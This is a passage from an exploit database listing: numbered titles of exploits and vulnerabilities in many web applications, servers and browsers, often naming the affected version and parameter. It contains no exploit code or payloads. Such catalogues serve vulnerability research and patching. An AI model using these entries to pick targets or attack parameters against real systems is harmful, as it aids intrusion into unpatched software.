Blind SQL Injection Exploit [8643] Realty Web-Base 1.0 (Auth Bypass) SQL Injection Vulnerability [8622] webSPELL <= 4.2.0e (page) Remote Blind SQL Injection Exploit [8564] Baby Web Server 2.7.2.0 Arbitrary File Disclosure Exploit [8561] Quick 'n Easy Web Server 3.3.5 Arbitrary File Disclosure Exploit [8559] webSPELL <= 4.2.0d Local File Disclosure Exploit (.c linux) [8537] dwebpro 6.8.26 (dt/fd) Multiple Vulnerabilities [8524] Home Web Server <= r1.7.1 (build 147) Gui Thread-Memory Corruption [8516] WebPortal CMS 0.8b Multiple Remote/Local File Inclusion Vulnerabilities [8511] Xitami Web Server <= 5.0 - Remote Denial of Service Exploit [8500] Zervit Webserver 0.3 - Remote Denial of Service Exploit [8487] EZ Webitor (Auth Bypass) SQL Injection Vulnerability [8486] webClassifieds 2005 (Auth Bypass) Insecure Cookie Handling Vuln [8463] Zervit Webserver 0.02 Remote Directory Traversal Vulnerability [8453] webSPELL 4.2.0c Bypass BBCode XSS Cookie Stealing Vulnerability [8447] Zervit Webserver 0.02 Remote Buffer Overflow PoC [8446] FreeWebshop.org 2.2.9 RC2 (lang_file) Local File Inclusion Vulnerability [8428] MonGoose 2.4 Webserver Directory Traversal Vulnerability (win) [8409] Yellow Duck Weblog 2.1.0 (lang) Local File Inclusion Vulnerability [8392] Chance-i DiViS DVR System Web-server Directory Traversal Vulnerability [8391] Chance-i DiViS-Web DVR System ActiveX Control Heap Overflow PoC [8382] WebFileExplorer 3.1 (Auth Bypass) SQL Injection Vulnerability [8374] WebFileExplorer 3.1 (DB.MDB) Database Disclosure Vulnerability [8368] peterConnects Web Server Traversal Arbitrary File Access Vulnerability [8336] Oracle WebLogic IIS connector JSESSIONID Remote Overflow Exploit [8333] Sun Calendar Express Web Server - (DoS/XSS) Multiple Remote Vulns [8328] webEdition <= 6.0.0.4 (WE_LANGUAGE) Local File Inclusion Vulnerability [8313] Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow [8288] WeBid 0.7.3 RC9 (upldgallery.php) Remote File Upload Vulnerability [8213] VLC 0.9.8a Web UI (input) Remote Denial of Service Exploit [8209] Kim Websites 1.0 (Auth Bypass) SQL Injection Vulnerability [8195] WeBid <= 0.7.3 RC9 Multiple Remote File Inclusion Vulnerabilities [8188] CMS WEBjump! Multiple SQL Injection Vulnerabilities [8156] Easy Web Password 1.2 - Local Heap Memory Consumption PoC [8155] Easy File Sharing Web Server 4.8 File Disclosure Vulnerability [8111] SkyPortal WebLinks 0.12 Contents Change Vulnerability [8025] webframe 0.76 Multiple File Inclusion Vulnerabilities [8017] SnippetMaster Webpage Editor 2,2,2 (RFI/XSS) Multiple Vulnerabilities [7989] Amaya Web Browser 11 (bdo tag) Remote Stack Overflow Exploit (vista) [7988] Amaya Web Browser 11 (bdo tag) Remote Stack Overflow Exploit (xp) [7966] navicopa webserver 3.0.1 (bof/sd) Multiple Vulnerabilities [7961] WEBalbum 2.4b (photo.php id) Blind SQL Injection Exploit [7926] Amaya Web Editor 11 Remote SEH Overwrite Exploit [7919] Profense Web Application Firewall 2.6.2 - CSRF/XSS Vulnerabilities [7910] WOW - Web On Windows ActiveX Control 2 Remote Code Execution [7906] Amaya Web Editor <= 11.0 - Remote Buffer Overflow PoC [7902] Amaya Web Editor XML and HTML parser Vulnerabilities [7861] Web-Calendar Lite 1.0 (Auth Bypass) SQL Injection Vulnerability [7790] netsurf web browser 1.2 - Multiple Vulnerabilities [7657] webSPELL <= 4.01.02 (id) Remote Edit Topics Vulnerability [7653] Webspell 4 (Auth Bypass) SQL Injection Vulnerability [7635] ASPThai.Net Webboard 6.0 (bview.asp) SQL Injection Vulnerability [7627] Pixel8 Web Photo Album 3.0 - Remote SQL Injection Vulnerability [7617] SasCam WebCam Server 2.6.5 ActiveX Remote BOF Exploit [7602] webClassifieds 2005 (Auth Bypass) SQL Injection Vulnerability [7596] AlstraSoft Web Email Script Enterprise (id) SQL Injection Vuln [7586] Miniweb 2.0 (Auth Bypass) SQL Injection Vulnerability [7584] Amaya Web Browser <= 11.0.1 - Remote Buffer Overflow Exploit (vista) [7553] RoundCube Webmail <= 0.2b Remote Code Execution Exploit [7549] RoundCube Webmail <= 0.2-3 beta Code Execution Vulnerability [7525] Extract Website (download.php filename) File Disclosure Vulnerability [7521] webcamXP 5.3.2.375 Remote File Disclosure Vulnerability [7515] phpclanwebsite <= 1.23.3 fix pack #5 Multiple Vulnerabilities [7488] Web Wiz Guestbook 8.21 (WWGguestbook.mdb) DD Vulnerability [7467] Amaya Web Browser 10.0.1/10.1-pre5 (html tag) Buffer Overflow PoC [7465] isweb cms 3.0 (sql/xss) Multiple Vulnerabilities [7445] Discussion Web 4 - Remote Database Disclosure Vulnerability [7407] Webmaster Marketplace (member.php u) SQL Injection Vulnerability [7388] webcaf <= 1.4 (lfi/rce) Multiple Vulnerabilities [7298] Active Web Helpdesk 2 - (CategoryID) Blind SQL Injection Vulnerability [7293] Active Web Helpdesk 2 - (Auth Bypass) SQL Injection Vulnerability [7288] Active Web Mail 4 - Blind SQL Injection Vulnerability [7281] Active Web Mail 4 - (Auth Bypass) Remote SQL Injection Vulnerability [7279] eWebquiz 8 - (Auth Bypass) Remote SQL Injection Vulnerability [7277] Active Websurvey 9.1 (Auth Bypass) Remote SQL Injection Vulnerability [7265] web calendar system <= 3.40 (xss/sql) Multiple Vulnerabilities [7252] Web Calendar 4.1 (Auth Bypass) SQL Injection Vulnerability [7242] web calendar system 3.12/3.30 Multiple Vulnerabilities [7236] WebStudio CMS - (pageid) Remote Blind SQL Injection Vulnerability (mil mixup) [7225] pie web m{a,e}sher mod rss 0.1 - Remote File Inclusion Vulnerability [7223] WebStudio eCatalogue (pageid) Blind SQL Injection Vulnerability [7222] WebStudio eHotel (pageid) Blind SQL Injection Vulnerability [7221] Pie Web M{a,e}sher 0.5.3 - Multiple Remote File Inclusion Vulnerability [7216] WebStudio CMS (index.php pageid) Blind SQL Injection Vulnerability [7215] bandwebsite 1.5 (sql/xss) Multiple Vulnerabilities [7213] W3C Amaya 10.1 Web Browser (id) Remote Stack Overflow PoC [7209] W3C Amaya 10.1 Web Browser (URL Bar) Remote Stack Overflow PoC [7120] Bankoi Webhost Panel 1.20 (Auth Bypass) SQL Injection Vulnerability [7116] AlstraSoft Web Host Directory 1.2 - Multiple Vulnerabilities [7109] Pi3Web <= 2.0.3 (ISAPI) Remote Denial of Service Exploit [7107] turnkeyforms Web Hosting Directory Multiple Vulnerabilities [7103] AlstraSoft Web Host Directory (Auth Bypass) SQL Injection Vuln [7049] Mini Web Calendar 1.2 (File Disclosure/XSS) Multiple Vulnerabilities [7012] hMAilServer 4.4.2 (PHPWebAdmin) File Inclusion Vulnerabilities [7005] PHP JOBWEBSITE PRO (Auth Bypass) SQL Injection Vulnerability [6989] WEBBDOMAIN Post Card <= 1.02 (SQL Injection) Auth Bypass Vuln [6986] WEBBDOMAIN Webshop <= 1.02 (SQL Injection) Auth Bypass Vuln [6985] WEBBDOMAIN Quiz <= 1.02 (Auth Bypass) SQL Injection Vulnerability [6984] WEBBDOMAIN Polls 1.01 (SQL Injection) Auth Bypass Vulnerability [6983] WEBBDOMAIN Petition 1.02/2.0/3.0 (SQL Injection) Auth Bypass Vuln [6977] WEBBDOMAIN Post Card <= 1.02 (catid) SQL Injection Vulnerability [6974] WEBBDOMAIN WebShop 1.02 (SQL/XSS) Multiple Vulnerabilities [6922] SFS EZ Webstore (where) Remote SQL Injection Vulnerability [6913] SFS EZ Webring (cat) Remote SQL Injection Vulnerability [6909] Adult Banner Exchange Website (targetid) SQL Injection Vulnerability [6898] U-Mail Webmail 4.91 (edit.php) Arbitrary File Write Vulnerability [6869] WebCards <= 1.3 - Remote SQL Injection Vulnerability [6822] websvn <= 2.0 (xss/fh/ce) Multiple Vulnerabilities [6771] Calendars for the Web 4.02 Admin Auth Bypass Vulnerability [6755] PhpWebGallery <= 1.7.2 Session Hijacking / Code Execution Exploit [6703] WebBiscuits Modules Controller <= 1.1 (RFI/RFD) Remote Vulnerabilities [6669] JMweb Multiple (src) Local File Inclusion Vulnerabilities [6653] OLIB 7 WebView 2.5.1.1 (infile) Local File Inclusion Vulnerability [6614] Mozilla Firefox 3.0.3 User Interface Null Pointer Dereference Crash [6610] ParsaWeb CMS (Search) Remote SQL Injection Vulnerability [6577] PromoteWeb MySQL (go.php id) Remote SQL Injection Vulnerability [6576] Ultimate Webboard 3.00 (Category) SQL Injection Vulnerability [6556] webcp 0.5.7 (filelocation) Remote File Disclosure Vulnerability [6544] WebPortal CMS <= 0.7.4 (code) Remote Code Execution Vulnerability [6542] JETIK-WEB Software (sayfa.php kat) SQL Injection Vulnerability [6539] Sofi WebGui <= 0.6.3 PRE (mod_dir) Remote File Inclusion Vulnerability [6450] Sports Clubs Web Panel 0.0.1 - Remote Game Delete Exploit [6448] WebPortal CMS <= 0.7.4 (fckeditor) Arbitrary File Upload Vulnerability [6443] WebPortal CMS <= 0.7.4 (download.php aid) SQL Injection Exploit [6440] PhpWebGallery 1.3.4 - Remote Blind SQL Injection Exploit [6439] Sports Clubs Web Panel 0.0.1 - Remote File Upload Vulnerability [6436] PhpWebGallery 1.3.4 (cat) Blind SQL Injection Vulnerability [6435] Sports Clubs Web Panel 0.0.1 (id) SQL Injection Vulnerabilities [6427] Sports Clubs Web Panel 0.0.1 (p) Local File Inclusion Vulnerability [6425] PhpWebGallery 1.3.4 (XSS/LFI) Multiple Vulnerabilities [6420] aspwebalbum 3.2 - Multiple Vulnerabilities [6414] Peachtree Accounting 2004 (PAWWeb11.ocx) ActiveX Insecure Method [6410] Kim Websites 1.0 (fckeditor) Remote Arbitrary File Upload Vulnerability [6391] Flock Social Web Browser 1.2.5 (loop) Remote Denial of Service Exploit [6370] WebCMS Portal Edition (index.php id) Blind SQL Injection Exploit [6361] Living Local Website (listtest.php r) SQL Injection Vulnerability [6357] aspwebalbum 3.2 (upload/sql/xss) Multiple Vulnerabilities [6344] WeBid 0.5.4 (fckeditor) Remote Arbitrary File Upload Exploit [6341] WeBid 0.5.4 (item.php id) Remote SQL Injection Vulnerability [6339] webid 0.5.4 - Multiple Vulnerabilities [6335] Web Directory Script 1.5.3 (site) SQL Injection Vulnerability [6303] WebBoard <= 2.0 Arbitrary SQL Question/Anwser Delete Vulnerability [6298] Web Directory Script <= 2.0 (name) SQL Injection Vulnerability [6281] webEdition CMS (we_objectID) Blind SQL Injection Exploit [6278] Anzio Web Print Object <= 3.2.30 ActiveX Buffer Overflow Exploit [6225] PHP-Ring Webring System 0.9.1 Insecure Cookie Handling Vulnerability [6220] Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit [6151] velocity web-server 1.0 - Directory Traversal file download vulnerability [6136] phpWebNews 0.2 MySQL Edition (SQL) Insecure Cookie Handling Vuln [6115] EZWebAlbum Insecure Cookie Handling Vulnerability [6112] EZWebAlbum (dlfilename) Remote File Disclosure Vulnerability [6089] Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit [6081] Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability [6079] Comdev Web Blogger <= 4.1.3 (arcmonth) SQL Injection Vulnerability [6075] Galatolo Web Manager 1.3a <= XSS / Remote SQL Injection Vulnerability [6064] Maian Weblog <= 4.0 Insecure Cookie Handling Vulnerability [6056] WebCMS Portal Edition (id) Remote SQL Injection Vulnerability [6037] phpDatingClub (website.php page) Local File Inclusion Vulnerability [6015] WebXell Editor 0.1.3 - Arbitrary File Upload Vulnerability [5999] phpWebNews 0.2 MySQL Edition (det) SQL Injection Vulnerability [5998] phpWebNews 0.2 MySQL Edition (id_kat) SQL Injection Vulnerability [5997] CMS WebBlizzard (index.php page) Blind SQL Injection Exploit [5993] Joomla Component com_brightweblinks (catid) SQL Injection Vulnerability [5985] VanGogh Web CMS 0.9 (article_ID) Remote SQL Injection Vulnerability [5972] RCM Revision Web Development (products.php) SQL Injection Vulnerability [5966] Joomla Component Xe webtv (id) Blind SQL Injection Exploit [5956] Keller Web Admin CMS 0.94 Pro Local File Inclusion Vulnerability (1st) [5950] Cheats Complete Website 1.1.1 (itemid) SQL Injection Vulnerability [5949] Drinks Complete Website 2.1.0 (drinkid) SQL Injection Vulnerability [5948] Jokes Complete Website 2.1.3 (jokeid) SQL Injection Vulnerability [5947] Tips Complete Website 1.2.0 (tipid) SQL Injection Vulnerability [5946] Riddles Complete Website 1.2.1 (riddleid) SQL Injection Vulnerability [5940] Keller Web Admin CMS 0.94 Pro Local File Inclusion Vulnerability [5932] Webdevindo-CMS 0.1 (index.php hal) Remote SQL Injection Vulnerability [5918] uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 Range header DoS Exploit [5912] MVC-Web CMS 1.0/1.2 (index.asp newsid) SQL Injection Vulnerability [5867] AJ Auction Web 2.0 (cate_id) SQL Injection Vulnerability [5861] Academic Web Tools CMS <= 1.4.2.8 - Multiple Vulnerabilities [5856] nweb2fax <= 0.2.7 - Multiple Vulnerabilities [5855] Easy Webstore 1.2 (index.php postid) Remote SQL Injection Vulnerability [5850] AspWebCalendar 2008 Remote File Upload Vulnerability [5847] WebCalendar 1.0.4 (includedir) Remote File Inclusion Vulnerability [5830] NiTrO Web Gallery <= 1.4.3 (section) Remote SQL Injection Vulnerability [5807] PHP JOBWEBSITE PRO (JobSearch3.php) SQL Injection Vulnerability [5802] WebChamado 1.1 (tsk_id) Remote SQL Injection Vulnerability [5798] WebChamado 1.1 Arbitrary Add Admin Exploit [5763] real estate web site 1.0 (sql/xss) Multiple Vulnerabilities [5760] Galatolo Web Manager <= 1.0 - Remote SQL Injection Exploit [5758] Galatolo Web Manager 1.0 XSS / Local File Inclusion Vulnerability [5725] smeweb 1.4b (sql/xss) Multiple Vulnerabilities [5664] webl?sninger <= 4 - (xss/sql) Multiple Vulnerabilities [5641] CMS WebManager-Pro Multiple Remote SQL Injection Vulnerabilities [5638] How2ASP.net Webboard <= 4.1 - Remote SQL Injection Vulnerability [5635] Archangel Weblog 0.90.02 (post_id) SQL Injection Exploit [5633] StanWeb.CMS (default.asp id) Remote SQL Injection Exploit [5629] Web Slider <= 0.6 Insecure Cookie/Authentication Handling Vuln [5606] Web Group Communication Center (WGCC) <= 1.0.3 - SQL Injection Vuln [5548] Miniweb 2.0 (historymonth) Remote SQL Injection Vulnerability [5536] HLDS WebMod 0.48 (rconpass) Remote Heap Overflow Exploit [5534] HLDS WebMod 0.48 Multiple Remote Vulnerabilties [5527] Joomla Component Webhosting (catid) Blind SQL Injection Exploit [5517] Softbiz Web Host Directory Script (host_id) SQL Injection Vulnerability [5485] Web Calendar <= 4.1 - Blind SQL Injection Exploit [5354] Xitami Web Server 2.5c2 - LRWP Processing Format String PoC [5331] Neat weblog 0.2 (articleId) Remote SQL Injection Vulnerability [5304] HIS-Webshop (his-webshop.pl t) Remote File Disclosure Vulnerability [5268] Apple Safari (webkit) Remote Denial of Service Exploit (iphone/osx/win) [5255] eXV2 Module WebChat 1.60 - (roomid) Remote SQL Injection Vulnerability [5215] Ruby 1.8.6 (Webrick Httpd 1.3.1) Directory Traversal Vulnerability [5212] MiniWebSvr 0.0.9a Remote Directory Transversal Vulnerability [5185] PORAR WEBBOARD (question.asp) Remote SQL Injection Vulnerability [5182] Portail Web Php <= 2.5.1.1 - Multiple Inclusion Vulnerabilities [5137] XPWeb 3.3.2 (Download.php url) Remote File Disclosure Vulnerability [5116] artmedic weblog 1.0 - Multiple Local File Inclusion Vulnerabilities [5111] IBM Domino Web Access Upload Module - SEH Overwrite Exploit [5060] VHD Web Pack 2.0 (index.php page) Local File Inclusion Vulnerability [4982] Gateway WebLaunch ActiveX Remote Buffer Overflow Exploit [4972] Web Wiz NewsPad 1.02 (sub) Remote Directory Traversal Vulnerability [4971] web wiz rich text editor 4.0 - Multiple Vulnerabilities [4970] Web Wiz Forums <= 9.07 (sub) Remote Directory Traversal Vulnerability [4959] HP Virtual Rooms WebHPVCInstall Control Buffer Overflow Exploit [4944] 360 Web Manager 3.0 (IDFM) SQL Injection Vulnerability [4923] miniweb 0.8.19 Multiple Vulnerabilities [4921] MailBee WebMail Pro 4.1 (ASP.NET) Remote File Disclosure Vulnerability [4913] Macrovision FlexNet isusweb.dll DownloadAndExecute Method Exploit [4872] PHP Webquest 2.6 Get Database Credentials Vulnerability [4869] Gateway Weblaunch ActiveX Control Insecure Method Exploit [4867] PHP Webquest 2.6 (id_actividad) Remote SQL Injection Exploit [4850] Horde Web-Mail 3.x (go.php) Remote File Disclosure Vulnerability [4846] Uebimiau Web-Mail 2.7.10/2.7.2 - Remote File Disclosure Vulnerability [4836] samPHPweb (songinfo.php) Remote SQL Injection Vulnerability [4835] WebPortal CMS 0.6-beta Remote Password Change Exploit [4834] samPHPweb (db.php commonpath) Remote File Inclusion Vulnerability [4828] AGENCY4NET WEBFTP 1 download2.php File Disclosure Vulnerability [4826] WebPortal CMS <= 0.6.0 (index.php m) Remote SQL Injection Exploit [4820] IBM Domino Web Access Upload Module dwa7w.dll BoF Exploit [4819] Macrovision Installshield isusweb.dll SEH Overwrite Exploit [4818] IBM Domino Web Access Upload Module inotes6.dll BoF Exploit [4777] WebSihirbazi 5.1.1 (pageid) Remote SQL Injection Vulnerability [4748] SurgeMail v.38k4 webmail Host header Denial of Service Exploit [4744] rooter VDSL Device (Goahead WEBSERVER) Disclosure Vulnerability [4743] FreeWebshop <= 2.2.7 (cookie) Admin Password Grabber Exploit [4740] FreeWebshop 2.2.1 - Remote Blind SQL Injection Exploit [4739] MOG-WebShop (index.php group) Remote SQL Injection Exploit [4719] Mcms Easy Web Make (index.php template) Local File Inclusion Vuln [4696] SerWeb <= 2.0.0 dev1 2007-02-20 - Multiple RFI / LFI Vulnerabilities [4677] WebED 0.0.9 (index.php) Remote File Disclosure Vulnerability [4676] Web-MeetMe 3.0.3 (play.php) Remote File Disclosure Vulnerability [4653] WorkingOnWeb 2.0.1400 events.php Remote SQL Injection Vulnerability [4579] GOM Player 2.1.6.3499 (GomWeb3.dll 1.0.0.12) Remote Overflow Exploit [4556] LiteSpeed Web Server <= 3.2.3 - Remote Source Code Disclosure Vuln [4552] Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support) [4530] Apache Tomcat (webdav) Remote File Disclosure Exploit [4518] WebDesktop 0.1 - Remote File Inclusion Vulnerabilities [4482] Web Template Management System 1.3 - Remote SQL Injection [4450] Xitami Web Server 2.5 (If-Modified-Since) Remote BoF Exploit (0day) [4407] PHP Webquest <= 2.5 (id_actividad) Remote SQL Injection Exploit [4384] WebED 0.8999a Multiple Remote File Inclusion Vulnerabilities [4370] Webace-Linkscript 1.3 SE (start.php) Remote SQL Injection Vulnerability [4362] Web Oddity Web Server 0.09b Directory Transversal Exploit [4352] Weblogicnet (files_dir) Multiple Remote File Inclusion Vulnerabilities [4335] Yahoo! Messenger 8.1.0.413 (webcam) Remote Crash Exploit [4286] IBM Rational ClearQuest Web Login Bypass SQL Injection Vulnerability [4284] Prozilla Webring Website Script (category.php cat) Remote SQL Injection [4224] Webyapar 2.0 - Multiple Remote SQL Injection Vulnerabilities [4168] Sun Java WebStart JNLP Stack Buffer Overflow Exploit PoC [4157] SAP DB 7.4 WebTools Remote SEH overwrite Exploit [4129] Ripe Website Manager (CMS) <= 0.8.9 - Remote File Inclusion Vulns [4125] WebChat 0.78 (login.php rid) Remote SQL Injection Vulnerability [4112] EVA-Web 1.1<= 2.2 (index.php3) Remote File Inclusion Vulnerabilities [4097] dagger web engine <= 23jan2007 - Remote File Inclusion Vulnerability [4089] SerWeb 0.9.4 (load_lang.php) Remote File Inclusion Exploit [4083] W1L3D4 WEBmarket 0.1 - Remote SQL Injection Vulnerability [4053] Yahoo! Messenger Webcam 8.1 (Ywcupl.dll) Download / Execute Exploit [4052] Yahoo! Messenger Webcam 8.1 (Ywcvwr.dll) Download / Execute Exploit [4046] MiniWeb Http Server 0.8.x Remote Denial of Service Exploit [4043] Yahoo! Messenger Webcam 8.1 ActiveX Remote Buffer Overflow Exploit 2 [4042] Yahoo! Messenger Webcam 8.1 ActiveX Remote Buffer Overflow Exploit [4031] Madirish Webmail 2.0 (addressbook.php) Remote File Inclusion Vuln [3987] Webavis 0.1.1 (class.php root) Remote File Inclusion Vulnerability [3922] webdesproxy 0.0.1 (GET Request) Remote Root Exploit (exec-shield) [3913] webdesproxy 0.0.1 (GET Request) Remote Buffer Overflow Exploit [3859] Archangel Weblog 0.90.02 Local File Inclusion / Admin Bypass Vulns [3795] Advanced Webhost Billing System (AWBS) cart2.php RFI Vulnerability [3778] WEBInsta FM 0.1.4 login.php absolute_path Remote File Inclusion Exploit [3774] PHP-Ring Webring System 0.9 - Remote SQL Injection Vulnerability [3745] Web Slider 0.6 (path) Remote File Inclusion Vulnerabilities [3717] WebKalk2 1.9.0 (absolute_path) Remote File Inclusion Vulnerability [3708] MiniWebsvr 0.0.7 - Remote Directory Transversal Exploit [3673] WebSPELL <= 4.01.02 (picture.php) File Disclosure Vulnerability [3622] WinMail Server 4.4 build 1124 (WebMail) Remote Add Super User Exploit [3592] Web Content System 2.7.1 - Remote File Inclusion Exploit [3589] NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta) [3558] eWebquiz <= 8 - (eWebQuiz.asp) Remote SQL Injection Exploit [3546] aspWebCalendar 4.5 (calendar.asp eventid) SQL Injection Vulnerability [3542] ClassWeb 2.0.3 (BASE) Remote File Inclusion Vulnerabilities [3492] WebCalendar 0.9.45 (includedir) Remote File Inclusion Vulnerability [3485] Company WebSite Builder PRO 1.9.8 (INCLUDE_PATH) RFI Vulnerability [3484] WebLog (index.php file) Remote File Disclosure Vulnerability [3473] WebCreator <= 0.2.6-rc3 (moddir) Remote File Inclusion Vulnerability [3436] WEBO (Web Organizer) <= 1.0 (baseDir) Remote File Inclusion Vuln [3402] webSPELL <= 4.01.02 Remote PHP Code Execution Exploit [3400] webSPELL <= 4.01.02 Multiple Remote SQL Injection Exploit [3395] WebMod 0.48 (Content-Length) Remote Buffer Overflow Exploit PoC [3392] DivX Web Player 1.3.0 (npdivx32.dll) Remote Denial of Service Exploit [3381] NetProxy <= 4.03 Web Filter Evasion / Bypass Logging Exploit [3351] webSPELL <= 4.01.02 (topic) Remote SQL Injection Exploit [3339] Online Web Building 2.0 (id) Remote SQL Injection Vulnerability [3325] webSPELL 4.01.02 (showonly) Remote Blind SQL Injection Exploit [3304] MiniWebsvr <= 0.0.6 - Remote Resource Consumption DoS Exploit [3302] Lotus Domino <= R6 Webmail Remote Password Hash Dumper Exploit [3291] SAP Web Application Server 6.40 Arbitrary File Disclosure Exploit [3281] WebMatic 2.6 (index_album.php) Remote File Include Vulnerability [3250] Portail Web Php <= 2.5.1 (includes.php) Remote File Inclusion Vuln [3249] WebBuilder 2.0 (StageLoader.php) Remote File Include Vulnerability [3222] Webfwlog <= 0.92 (debug.php) Remote File Disclosure Vulnerability [3172] webSPELL 4.01.02 (gallery.php) Remote Blind SQL Injection Exploit [3169] WebChat 0.77 (defines.php WEBCHATPATH) Remote File Include Vuln [3163] Neon Labs Website <= 3.2 (nl.php g_strRootDir) Remote Inclusion Vuln [3138] Twilight Webserver 1.3.3.0 (GET) Remote Denial of Service Exploit [3135] Okul Web Otomasyon Sistemi 4.0.1 - Remote SQL Injection Vulnerability [3123] FdWeB Espace Membre <= 2.01 (path) Remote File Include Exploit [3105] MOTIONBORG Web Real Estate <= 2.1 - SQL Injection Vulnerability [3100] Magic Photo Storage Website _config[site_path] File Include Vuln [3098] OmniWeb 5.5.1 Javascript alert() Remote Format String PoC [3092] NaviCOPA Web Server 2.01 (GET) Remote Buffer Overflow Exploit meta [3076] Simple Web Content Management System Remote SQL Injection Exploit [3038] Durian Web Application Server 3.02 Denial of Service Exploit [3037] Durian Web Application Server 3.02 Remote Buffer Overflow Exploit [3036] WebText <= 0.4.5.2 - Remote Code Execution Exploit [3034] AIDeX Mini-WebServer <= 1.1 - Remote Denial of Service Crash Exploit [2996] Enthrallweb eNews 1.0 - Remote User Pass Change Exploit [2995] Enthrallweb eCoupons 1.0 - (myprofile.asp) Remote Pass Change Exploit [2994] Enthrallweb eClassifieds 1.0 - Remote User Pass Change Exploit [2991] Enthrallweb ePages (actualpic.asp) Remote SQL Injection Exploit [2990] Enthrallweb emates 1.0 (newsdetail.asp) Remote SQL Injection Exploit [2989] Enthrallweb eCars 1.0 (types.asp) Remote SQL Injection Vulnerability [2988] Enthrallweb eJobs (newsdetail.asp) Remote SQL Injection Exploit [2987] Enthrallweb eHomes 1.0 - Multiple (SQL/XSS) Vulnerabilities [2986] Enthrallweb ePhotos 1.0 (subLevel2.asp) SQL Injection Vulnerability [2974] Http explorer Web Server 1.02 Directory Transversal Vulnerability [2939] mxBB Module WebLinks <= 2.05 Remote Inclusion Vulnerability [2938] Bandwebsite <= 1.5 (Login) Remote Add Admin Exploit [2920] Barman 0.0.1r3 (interface.php) Remote File Include Vulnerability [2835] Wallpaper Complete Website 1.0.09 Remote SQL Injection Vulnerabilities [2834] Recipes Complete Website 1.1.14 Remote SQL Injection Vulnerabilities [2811] phpWebThings <= 1.5.2 (editor.php) Remote File Include Vulnerability [2788] Kerio WebSTAR 5.4.2 (libucache.dylib) Privilege Escalation Exploit (OSX) [2722] Webdrivers Simple Forum (message_details.php) SQL Injection Exploit [2716] Essentia Web Server 2.15 (GET Request) Remote DoS Exploit [2704] freewebshop.org script <= 2.2.2 - Multiple Vulnerabilities [2699] EFS Easy Address Book Web Server <= 1.2 - Remote File Stream Exploit [2690] Easy File Sharing Web Server 4 Remote Information Stealer Exploit [2673] Simple Website Software 0.99 (common.php) File Include Vulnerability [2651] MiniHttpServer Web Forum & File Sharing Server 4.0 Add User Exploit [2626] MDweb <= 1.3 (chemin_appli) Remote File Include Vulnerabilities [2611] Trawler Web CMS <= 1.8.1 - Multiple Remote File Include Vulnerabilities [2568] webSPELL <= 4.01.01 (getsquad) Remote SQL Injection Exploit [2561] NuralStorm Webmail <= 0.98b (process.php) Remote Include Vulnerability [2496] WebYep <= 1.1.9 (webyep_sIncludePath) File Include Vulnerabilities [2462] phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities [2461] VAMP Webmail <= 2.0beta1 (yesno.phtml) Remote Include Vulnerability [2460] MS Internet Explorer WebViewFolderIcon setSlice() Exploit (c) [2458] MS Internet Explorer WebViewFolderIcon setSlice() Exploit (pl) [2451] phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability [2448] MS Internet Explorer WebViewFolderIcon setSlice() Exploit (html) [2445] NaviCOPA Web Server 2.01 (GET) Remote Buffer Overflow Exploit [2440] MS Internet Explorer WebViewFolderIcon setSlice() Overflow Exploit [2435] WEB//NEWS <= 1.4 (parser.php) Remote File Include Vulnerability [2419] Web-News <= 1.6.3 (template.php) Remote File Include Vulnerability [2416] xweblog <= 2.1 (kategori.asp) Remote SQL Injection Vulnerability [2404] Dr.Web Antivirus 4.33 (LHA long directory name) Local Overflow Exploit [2398] Digital WebShop <= 1.128 Multiple Remote File Include Vulnerabilities [2352] webSPELL <= 4.01.01 Database Backup Download Vulnerability [2335] MyABraCaDaWeb <= 1.0.3 (base) Remote File Include Vulnerabilities [2318] Web Server Creator 0.1 - (l) Remote Include Vulnerability [2269] Web3news <= 0.95 (PHPSECURITYADMIN_PATH) Remote Include Vuln [2257] CliServ Web Community <= 0.65 (cl_headers) Include Vulnerability [2189] WEBInsta CMS <= 0.3.1 (users.php) Remote File Include Vulnerability [2187] WEBInsta MM <= 1.3e (absolute_path) Remote File Include Exploit [2177] Joomla Webring Component <= 1.0 - Remote Include Vulnerability [2175] WEBinsta CMS <= 0.3.1 (templates_dir) Remote File Include Exploit [2171] WEBInsta MM 1.3e (cabsolute_path) Remote File Include Vulnerability [2167] SaveWebPortal <= 3.4 (page) Remote File Inclusion Vulnerability [2158] TinyWebGallery <= 1.5 (image) Remote Include Vulnerabilities [2149] Hitweb <= 4.2.1 (REP_INC) Remote File Include Vulnerability [2123] SQLiteWebAdmin 0.1 (tpl.inc.php) Remote Include Vulnerability [2113] SaveWeb Portal <= 3.4 (SITE_Path) Remote File Inclusion Vulnerabilities [2017] Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl) [1997] Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit [1972] Opera Web Browser 9.00 (iframe) Remote Denial of Service Exploit [1941] Mambo <= 4.6rc1 (Weblinks) Remote Blind SQL Injection Exploit (2) [1930] WeBBoA Host Script 1.1 - Remote SQL Injection Vulnerability [1922] Joomla <= 1.0.9 (Weblinks) Remote Blind SQL Injection Exploit [1920] Mambo <= 4.6rc1 (Weblinks) Blind SQL Injection Exploit [1907] aWebNews <= 1.5 (visview.php) Remote File Include Vulnerability [1898] WebprojectDB <= 0.1.3 (INCDIR) Remote File Include Vulnerability [1871] WebspotBlogging <= 3.0.1 (path) Remote File Include Vulnerability [1859] aspWebLinks 2.0 - Remote SQL Injection / Admin Pass Change Exploit [1841] F@cile Interactive Web <= 0.8x Remote (Include / XSS) Vulnerabilities [1827] V-Webmail <= 1.6.4 (pear_dir) Remote File Include Vulnerability [1819] PunkBuster < 1.229 (WebTool Service) Remote Buffer Overflow DoS [1681] Sybase EAServer 5.2 (WebConsole) Remote Stack Overflow Exploit [1673] phpWebSite <= 0.10.2 (hub_dir) Remote Commands Execution Exploit [1619] GreyMatter WebLog <= 1.21d Remote Command Execution Exploit (2) [1618] GreyMatter WebLog <= 1.21d Remote Command Execution Exploit (1) [1608] WebAlbum <= 2.02pl COOKIE[skin2] Remote Code Execution Exploit [1527] iGENUS WebMail <= 2.0.2 (config_inc.php) Remote Code Execution Exploit [1525] 